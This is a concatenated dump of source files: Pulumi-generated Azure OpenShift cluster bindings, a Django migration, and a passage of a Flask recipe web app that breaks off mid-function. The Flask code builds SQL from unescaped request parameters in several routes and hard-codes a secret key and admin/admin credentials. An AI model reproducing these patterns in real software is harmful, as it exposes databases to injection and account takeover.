def monitor_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']]:
"""
Configures Log Analytics integration.
"""
return pulumi.get(self, "monitor_profile")
@monitor_profile.setter
def monitor_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']]):
pulumi.set(self, "monitor_profile", value)
@property
@pulumi.getter(name="networkProfile")
def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:
"""
Configuration for OpenShift networking.
"""
return pulumi.get(self, "network_profile")
@network_profile.setter
def network_profile(self, value: Optional[pulumi.Input['NetworkProfileArgs']]):
pulumi.set(self, "network_profile", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input['PurchasePlanArgs']]:
"""
Define the resource plan as required by ARM for billing purposes
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input['PurchasePlanArgs']]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter(name="refreshCluster")
def refresh_cluster(self) -> Optional[pulumi.Input[bool]]:
"""
Allows node rotation
"""
return pulumi.get(self, "refresh_cluster")
@refresh_cluster.setter
def refresh_cluster(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "refresh_cluster", value)
@property
@pulumi.getter(name="resourceName")
def resource_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the OpenShift managed cluster resource.
"""
return pulumi.get(self, "resource_name")
@resource_name.setter
def resource_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_name", value)
@property
@pulumi.getter(name="routerProfiles")
def router_profiles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]]:
"""
Configuration for OpenShift router(s).
"""
return pulumi.get(self, "router_profiles")
@router_profiles.setter
def router_profiles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]]):
pulumi.set(self, "router_profiles", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class OpenShiftManagedCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]]] = None,
auth_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']]] = None,
monitor_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']]] = None,
network_profile: Optional[pulumi.Input[pulumi.InputType['NetworkProfileArgs']]] = None,
open_shift_version: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[pulumi.InputType['PurchasePlanArgs']]] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
OpenShift Managed cluster.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]] agent_pool_profiles: Configuration of OpenShift cluster VMs.
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']] auth_profile: Configures OpenShift authentication.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']] master_pool_profile: Configuration for OpenShift master VMs.
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']] monitor_profile: Configures Log Analytics integration.
:param pulumi.Input[pulumi.InputType['NetworkProfileArgs']] network_profile: Configuration for OpenShift networking.
:param pulumi.Input[str] open_shift_version: Version of OpenShift specified when creating the cluster.
:param pulumi.Input[pulumi.InputType['PurchasePlanArgs']] plan: Define the resource plan as required by ARM for billing purposes
:param pulumi.Input[bool] refresh_cluster: Allows node rotation
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_name_: The name of the OpenShift managed cluster resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]] router_profiles: Configuration for OpenShift router(s).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OpenShiftManagedClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
OpenShift Managed cluster.
:param str resource_name: The name of the resource.
:param OpenShiftManagedClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OpenShiftManagedClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]]] = None,
auth_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']]] = None,
monitor_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']]] = None,
network_profile: Optional[pulumi.Input[pulumi.InputType['NetworkProfileArgs']]] = None,
open_shift_version: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[pulumi.InputType['PurchasePlanArgs']]] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenShiftManagedClusterArgs.__new__(OpenShiftManagedClusterArgs)
__props__.__dict__["agent_pool_profiles"] = agent_pool_profiles
__props__.__dict__["auth_profile"] = auth_profile
__props__.__dict__["location"] = location
__props__.__dict__["master_pool_profile"] = master_pool_profile
__props__.__dict__["monitor_profile"] = monitor_profile
__props__.__dict__["network_profile"] = network_profile
if open_shift_version is None and not opts.urn:
raise TypeError("Missing required property 'open_shift_version'")
__props__.__dict__["open_shift_version"] = open_shift_version
__props__.__dict__["plan"] = plan
__props__.__dict__["refresh_cluster"] = refresh_cluster
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_name"] = resource_name_
__props__.__dict__["router_profiles"] = router_profiles
__props__.__dict__["tags"] = tags
__props__.__dict__["cluster_version"] = None
__props__.__dict__["fqdn"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["public_hostname"] = None
__props__.__dict__["type"] = None
        alias_opts = pulumi.ResourceOptions(aliases=[
            pulumi.Alias(type_="azure-nextgen:containerservice/v20191027preview:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-native:containerservice:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-nextgen:containerservice:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-native:containerservice/v20180930preview:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-nextgen:containerservice/v20180930preview:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-native:containerservice/v20190430:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-nextgen:containerservice/v20190430:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-native:containerservice/v20190930preview:OpenShiftManagedCluster"),
            pulumi.Alias(type_="azure-nextgen:containerservice/v20190930preview:OpenShiftManagedCluster")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(OpenShiftManagedCluster, __self__).__init__(
'azure-native:containerservice/v20191027preview:OpenShiftManagedCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'OpenShiftManagedCluster':
"""
Get an existing OpenShiftManagedCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = OpenShiftManagedClusterArgs.__new__(OpenShiftManagedClusterArgs)
__props__.__dict__["agent_pool_profiles"] = None
__props__.__dict__["auth_profile"] = None
__props__.__dict__["cluster_version"] = None
__props__.__dict__["fqdn"] = None
__props__.__dict__["location"] = None
__props__.__dict__["master_pool_profile"] = None
__props__.__dict__["monitor_profile"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_profile"] = None
__props__.__dict__["open_shift_version"] = None
__props__.__dict__["plan"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["public_hostname"] = None
__props__.__dict__["refresh_cluster"] = None
__props__.__dict__["router_profiles"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return OpenShiftManagedCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="agentPoolProfiles")
def agent_pool_profiles(self) -> pulumi.Output[Optional[Sequence['outputs.OpenShiftManagedClusterAgentPoolProfileResponse']]]:
"""
Configuration of OpenShift cluster VMs.
"""
return pulumi.get(self, "agent_pool_profiles")
@property
@pulumi.getter(name="authProfile")
def auth_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterAuthProfileResponse']]:
"""
Configures OpenShift authentication.
"""
return pulumi.get(self, "auth_profile")
@property
@pulumi.getter(name="clusterVersion")
def cluster_version(self) -> pulumi.Output[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "cluster_version")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
Service generated FQDN for OpenShift API server loadbalancer internal hostname.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="masterPoolProfile")
def master_pool_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterMasterPoolProfileResponse']]:
"""
Configuration for OpenShift master VMs.
"""
return pulumi.get(self, "master_pool_profile")
@property
@pulumi.getter(name="monitorProfile")
def monitor_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterMonitorProfileResponse']]:
"""
Configures Log Analytics integration.
"""
return pulumi.get(self, "monitor_profile")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkProfile")
def network_profile(self) -> pulumi.Output[Optional['outputs.NetworkProfileResponse']]:
"""
Configuration for OpenShift networking.
"""
return pulumi.get(self, "network_profile")
@property
@pulumi.getter(name="openShiftVersion")
def open_shift_version(self) -> pulumi.Output[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "open_shift_version")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[Optional['outputs.PurchasePlanResponse']]:
"""
Define the resource plan as required by ARM for billing purposes
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The current deployment or provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicHostname")
def public_hostname(self) -> pulumi.Output[str]:
"""
Service generated FQDN or private IP for OpenShift API server.
"""
return pulumi.get(self, "public_hostname")
@property
@pulumi.getter(name="refreshCluster")
def refresh_cluster(self) -> pulumi.Output[Optional[bool]]:
"""
Allows node rotation
"""
return pulumi.get(self, "refresh_cluster")
@property
@pulumi.getter(name="routerProfiles")
def router_profiles(self) -> pulumi.Output[Optional[Sequence['outputs.OpenShiftRouterProfileResponse']]]:
"""
Configuration for OpenShift router(s).
"""
return pulumi.get(self, "router_profiles")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| 47.514451 | 856 | 0.679927 | 2,475 | 24,660 | 6.471919 | 0.084848 | 0.078974 | 0.069984 | 0.035585 | 0.77107 | 0.690348 | 0.619491 | 0.51517 | 0.478836 | 0.403546 | 0 | 0.003357 | 0.214761 | 24,660 | 518 | 857 | 47.606178 | 0.823848 | 0.200689 | 0 | 0.411215 | 1 | 0 | 0.209171 | 0.108394 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152648 | false | 0.003115 | 0.024922 | 0 | 0.280374 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
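A minimal usage sketch of the generated resource above. The module path, resource names, and argument values are illustrative assumptions; open_shift_version and resource_group_name are the two inputs that _internal_init enforces as required:

import pulumi
from pulumi_azure_native.containerservice.v20191027preview import OpenShiftManagedCluster

# Hypothetical names and values, for illustration only.
cluster = OpenShiftManagedCluster(
    "example-cluster",
    resource_group_name="example-rg",
    open_shift_version="v3.11",
    location="eastus",
)
pulumi.export("fqdn", cluster.fqdn)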
40686f7cd56545ec9981f33c3903dd74fd6b1048 | 326 | py | Python | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-17 02:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quiz', '0016_auto_20210617_0724'),
]
operations = [
migrations.RemoveField(
model_name='quiz',
name='questions',
),
]
| 18.111111 | 47 | 0.588957 | 35 | 326 | 5.371429 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135371 | 0.297546 | 326 | 17 | 48 | 19.176471 | 0.68559 | 0.138037 | 0 | 0 | 1 | 0 | 0.143369 | 0.082437 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
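Migrations like the one above are normally generated rather than hand-written; a typical workflow sketch, with the app label taken from the dependency on '0016_auto_20210617_0724':

python manage.py makemigrations quiz   # detects the removed 'questions' field
python manage.py migrate quiz          # applies 0017 and drops the column

Note that RemoveField is destructive: once the migration is applied, the dropped column's data is gone unless the migration is reversed first.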
4069e772d72345dc8c5aa0533940bffe33f5921a | 18,348 | py | Python | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | # -*- coding: iso-8859-1 -*-
import os
import shutil
import datetime
import sqlite3
from flask import Flask, request, session, render_template, g, redirect, url_for, abort, flash, make_response
from random import randint
import json
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = '/tmp'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
DBBACKUPPATH = os.path.abspath('db_backup')
if not os.path.exists(DBBACKUPPATH):
os.mkdir(DBBACKUPPATH)
app = Flask(__name__)
#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER

def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
app.config.from_object(__name__)
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'recipes.db'),
SECRET_KEY='development key',
USERNAME='admin',
PASSWORD='default',
UPLOAD_FOLDER='/tmp'
))
app.config['UPLOAD_FOLDER'] = '/tmp'
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database."""
    if not os.path.exists(app.config['DATABASE']):
cmd = 'sqlite3 recipes.db < database.sql'
os.system(cmd)
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
def init_db():
db = get_db()
with app.open_resource('database.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def queryDbFetchOne(query):
"""Query database, return one result"""
db = get_db()
cur = db.cursor()
cur.execute(query)
return cur.fetchone()
def queryDbFetchAll(query):
"""Query database, return one result"""
db = get_db()
cur = db.cursor()
cur.execute(query)
return cur.fetchall()
def getRecipe(recipeKey):
"""Get recipe data"""
return queryDbFetchOne('SELECT * FROM recipes WHERE key="%s"'%recipeKey)
def getIngredients(recipeKey):
"""Get all ingredients for a recipe"""
return queryDbFetchAll('SELECT * FROM recipeAmount WHERE recipeKey="%s"'%recipeKey)
def getNextKey():
"""Get next number for key"""
currentHighKey = queryDbFetchOne('SELECT key FROM recipes ORDER BY key DESC')
    if currentHighKey is None:
        print("IS none %s" % currentHighKey)
        currentHighKey = 0
    else:
        currentHighKey = int(currentHighKey[0])
    return currentHighKey + 1
def insertIntoDb(table, names, values):
"""Insert into database"""
if len(values) != len(names):
return None
query = 'INSERT INTO %s (%s) VALUES(%s)'%(table, ', '.join(names), ', '.join(values))
rowId = None
try:
        db = get_db()
        cur = db.cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
def doRawQuery(query):
"""Do a raw query"""
rowId = None
try:
        db = get_db()
        cur = db.cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
def updateDb(table, names, values, where):
"""Update row in table"""
if len(values) != len(names):
return None
query = 'UPDATE %s SET '%(table)
qPairs = []
for name, value in zip(names,values):
qPairs.append('%s=%s'%(name,value))
query += ', '.join(x for x in qPairs)
query += ' %s'%where
rowId = None
try:
        db = get_db()
        cur = db.cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
@app.route('/prepdb')
def prepdb():
"""Prepare database from json file"""
f = open('recipes.json','r')
buff = f.read()
recipes = json.loads(buff)
for item in recipes:
recipeKey = getNextKey()
rowId = insertIntoDb('recipes', ['key', 'title','instructions', 'portions'],
[recipeKey, '"%s"'%item['title'], '"%s"'%item['instructions'], item['portions']])
for ingredient in item['ingredients']:
keys = ingredient.keys()
keys.insert(0, 'recipeKey')
values = ingredient.values()
values.insert(0, recipeKey)
rId = insertIntoDb('recipeAmount', keys, values)
for group in item['recipeTag']:
insertIntoDb('recipeTag', ['recipeKey', 'group'], [recipeKey, '"%s"'%group])
        if 'fridge' in item:
            insertIntoDb('fridge', ['recipeKey', 'portions'], [recipeKey, item['fridge']])
            print(" Fridge %d" % item['fridge'])
        else:
            print("No fridge")
return index()
@app.cli.command('initdb')
def initdb_command():
"""Initializes the database."""
init_db()
    print('Initialized the database.')
@app.route('/help')
def help():
values = {'pageId': 'help',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('help.html', **values)
@app.route('/')
def index():
values = {'pageId': 'index',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('index.html', **values)
# return redirect('login', code=304)
@app.route('/login', methods=['GET','POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != 'admin' or request.form['password'] != 'admin':
error = 'Invalid Credentials. Please try again.'
else:
return redirect(url_for('favourite'), code=304)
values = {'pageId': 'index',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048),
'error': error
}
return render_template('login.html', **values)
@app.route('/editRecipe', methods=['GET'])
def editRecipe():
return newRecipe(request.args['recipeKey'])
@app.route('/deleteRecipe', methods=['GET'])
def deleteRecipe():
    # Minimal implementation: remove the recipe and its ingredient rows.
    # TODO: also clean up related fridge entries.
    if 'recipeKey' in request.args:
        recipeKey = request.args['recipeKey']
        deleteAmount(recipeKey)
        doRawQuery('DELETE FROM recipes WHERE key=%s' % recipeKey)
    return redirect(url_for('index'))
def deleteAmount(recipeKey):
    query = 'DELETE FROM recipeAmount WHERE recipeKey=%s' % recipeKey
    rowId = None
    try:
        db = get_db()
        cur = db.cursor()
        cur.execute(query)
        db.commit()
        rowId = cur.lastrowid
    except:
        db.rollback()
        print("error in delete operation")
    finally:
        return rowId
@app.route('/newRecipe')
def newRecipe(recipeKey=None):
if recipeKey is not None:
recipe = getRecipe(recipeKey)
ingredients = getIngredients(recipeKey)
else:
recipe = None
ingredients = None
entries = queryDbFetchAll('SELECT name FROM ingredients ')
measurements = queryDbFetchAll('SELECT short FROM measurements ')
values = {'ingredientsList': entries,
'measurements':measurements,
'recipe':recipe,
'ingredients':ingredients,
'pageId': 'newRecipe',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('newRecipe.html', **values)
@app.route('/error')
def errorHtml():
values = {'pageId': 'error',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('error.html', **values)
@app.route('/saveRecipe', methods=['POST'])
def saveRecipe():
# TODO add last update time
title = request.form['title']
names = ['title']
values = ['"%s"'%title]
if 'instructions' in request.form:
names.append('instructions')
values.append('"%s"'%request.form['instructions'])
if 'portions' in request.form:
names.append('portions')
values.append(request.form['portions'])
if 'recipeKey' in request.form:
recipeKey = request.form['recipeKey']
updateDb('recipes', names, values, 'WHERE key=%s'%recipeKey)
else:
recipeKey = getNextKey()
names.insert(0, 'key')
values.insert(0, '%d'%recipeKey)
if insertIntoDb('recipes', names, values) is None:
return json.dumps({'redirect':'false', 'result': 'Error creating recipe'})
amount = request.form.getlist('amount')
measurement = request.form.getlist('measurement')
ingredients = request.form.getlist('ingredient')
deleteAmount(recipeKey)
for a,m,i in zip(amount, measurement, ingredients):
names = ['recipeKey', 'ingredient', 'amount', 'measurement']
values = [str(recipeKey), '"%s"'%i, str(a), '"%s"'%m]
if insertIntoDb('recipeAmount', names, values) is None:
return json.dumps({'redirect':'false', 'result': 'Error creating recipe'})
return json.dumps({'redirect':True, 'url': '/show/recipe?recipe=%s'%recipeKey})
@app.route('/show/recipe', methods=['GET'])
def showRecipe():
recipeKey = request.args.get('recipe')
recipe = getRecipe(recipeKey)
return displayRecipe(recipe)
def displayRecipe(recipe):
values = {'key':recipe['key'],
'title': recipe['title'],
'instructions': recipe['instructions'],
'portions': recipe['portions'],
'ingredients': getIngredients(recipe['key']),
'pageId': 'displayRecipe',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('displayRecipe_template.html', **values)
@app.route('/randomRecipe', methods=['GET'])
def randomRecipe():
recipes = queryDbFetchAll('SELECT * FROM recipes ORDER BY RANDOM() LIMIT 4')
return render_template('listRecipes.html', header='Förslag:', lastRecipes=recipes)
@app.route('/menuSuggestion', methods=['GET'])
def menuSuggestion():
recipes = queryDbFetchAll('SELECT * FROM recipes ORDER BY RANDOM() LIMIT 4')
if 'update' in request.args:
return render_template('onlyList.html', lastRecipes=recipes)
values = {'pagetitle':'Receptakuten',
'title': 'Förslag:',
'lastRecipes': recipes,
'refresh': 'true',
'pageId': 'menuSuggestion',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('listRecipes.html', **values)
@app.route('/ajax/search', methods=['GET'])
def searchAjax():
if request.method == 'GET':
patterns = request.args.getlist('searchPatterns[]')
query = ''
for p in patterns:
if len(query) > 0:
query = '%s or '%query
query += 'title LIKE "%%%s%%" or instructions LIKE "%%%s%%"'%(p, p)
query = 'SELECT key, title FROM recipes WHERE %s LIMIT 10'%query
results = queryDbFetchAll(query)
t = []
for p in results:
h = {}
for k in p.keys():
h[k] = p[k]
t.append(h)
return json.dumps(t)
@app.route('/ajax/searchIngredient', methods=['GET'])
def searchIngredient():
if request.method == 'GET':
patterns = request.args.getlist('searchPatterns[]')
        print(patterns)
query = ''
for p in patterns:
if len(query) > 0:
query = '%s or '%query
query += 'ingredient LIKE "%%%s%%"'%(p)
query = 'SELECT DISTINCT ingredient FROM recipeAmount WHERE %s'%query
        print(query)
results = queryDbFetchAll(query)
t = []
for p in results:
h = {}
for k in p.keys():
h[k] = p[k]
t.append(h)
return json.dumps(t)
@app.route('/search')
def search():
values = {'pageId': 'search',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('search.html', **values)
def getFridgeJSON():
fridgeContent = queryDbFetchAll('SELECT key, title, fridge.portions AS portions FROM recipes INNER JOIN fridge ON recipes.key = fridge.recipeKey')
fridgeJson = []
for row in fridgeContent:
rowJson = {}
for key in row.keys():
rowJson[key] = row[key]
fridgeJson.append(rowJson)
return json.dumps(fridgeJson)
@app.route('/fromTheFridge')
def fromTheFridge():
values = {'pageId': 'fromTheFridge',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('whatsinthefridge.html', **values)
# Update fridge content
@app.route('/ajax/updateFridge', methods=['GET','POST'])
def updateFridge():
if request.method == 'POST':
recipesJson = request.form.getlist('recipes')
recipes = json.loads(recipesJson[0])
keys = []
for item in recipes:
keys.append(item['key'])
queryUpdate = 'UPDATE fridge SET portions=%d WHERE recipeKey=%d'%(item['portions'], item['key'])
queryInsert = 'INSERT INTO fridge (recipeKey, portions) SELECT %d,%d WHERE(Select Changes() = 0)'%(item['key'], item['portions'])
doRawQuery(queryUpdate)
doRawQuery(queryInsert)
currentKeys = queryDbFetchAll('SELECT recipeKey FROM fridge ORDER BY recipeKey')
for key in currentKeys:
if key['recipeKey'] not in keys:
deleteQuery = 'DELETE FROM fridge WHERE recipeKey=%s'%key['recipeKey']
doRawQuery(deleteQuery)
return getFridgeJSON()
@app.route('/groceryList')
def groceryList():
recipes = queryDbFetchAll('SELECT key, title, portions FROM recipes ORDER BY title')
ingredients = {}
for recipe in recipes:
ingredients[recipe['key']] = getIngredients(recipe['key'])
values = {'pageId': 'groceryList',
'recipes': recipes,
'ingredients': ingredients,
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('groceryList.html', **values)
@app.route('/favourite')
def favourite():
"""Show favourite recipes"""
values = {'pageId': 'favouritePage',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('favourite.html', **values)
@app.route('/ajax/getRecipesJson', methods=['GET','POST'])
def getRecipesJson():
if request.method == 'POST':
recipeKeys = request.form.getlist('recipe')
        query = 'SELECT * FROM recipes WHERE '
        queryKeys = []
        for recipes in recipeKeys:
            jsonKeys = json.loads(recipes)
            for key in jsonKeys:
                queryKeys.append('key=%s' % key['recipeKey'])
        query += ' OR '.join(queryKeys)
recipeList = queryDbFetchAll(query)
jsonReply = []
for rowRecipe in recipeList:
tmpJson = {}
for key in rowRecipe.keys():
tmpJson[key] = rowRecipe[key]
ingredientsJson = []
for row in getIngredients(rowRecipe['key']):
tmpIngredient = {}
for key in row.keys():
if key == 'recipeKey':
continue
tmpIngredient[key] = row[key]
ingredientsJson.append(tmpIngredient)
tmpJson['ingredients'] = ingredientsJson
jsonReply.append(tmpJson)
return json.dumps(jsonReply)
recipes = queryDbFetchAll('SELECT key, title FROM recipes')
rows = []
for i in recipes:
rows.append(dict(i))
return json.dumps(rows)
@app.route('/manifest.json')
def manifestJSON():
return url_for('static', filename='manifest.json')
@app.route('/manifest.appcache')
def manifest():
res = make_response(render_template('manifest.appcache'), 200)
